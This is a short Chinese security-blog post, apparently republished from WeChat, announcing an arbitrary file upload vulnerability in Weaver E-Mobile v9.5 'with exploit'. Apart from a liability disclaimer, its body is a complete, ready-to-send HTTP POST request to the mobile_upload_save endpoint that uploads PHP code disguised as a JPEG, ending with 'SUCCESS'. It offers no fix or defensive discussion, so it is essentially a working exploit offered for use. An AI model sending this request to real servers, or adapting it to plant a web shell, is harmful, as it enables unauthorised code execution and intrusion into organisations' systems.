漏洞速递 | 泛微E-Mobile任意文件上传漏洞（附EXP）

漏洞速递 | 泛微E-Mobile任意文件上传漏洞（附EXP）
2023-5-29 08:2:45 Author: EchoSec(查看原文) 阅读量:315 收藏

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

泛微E-mobile v9.5任意文件上传漏洞

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1Host: xx:8088Content-Length: 338Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6ttUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7Connection: close
------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="upload_quwan"; filename="[email protected]"Content-Type: image/jpeg
<?php phpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="file"; filename=""Content-Type: application/octet-stream

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

SUCCESS

文章来源：利刃信安攻防实验室

觉得内容不错，就点下“赞”和“在看”
如侵权请私聊公众号删文

文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247487464&idx=1&sn=fb5391a43f46cdda680366e1433a4065&chksm=fcdf53f7cba8dae19120faf7bf9797bd58ef3dcffe15038d033771c6c9c295a3fdb21fa6f8eb#rd
如有侵权请联系:admin#unsafe.sh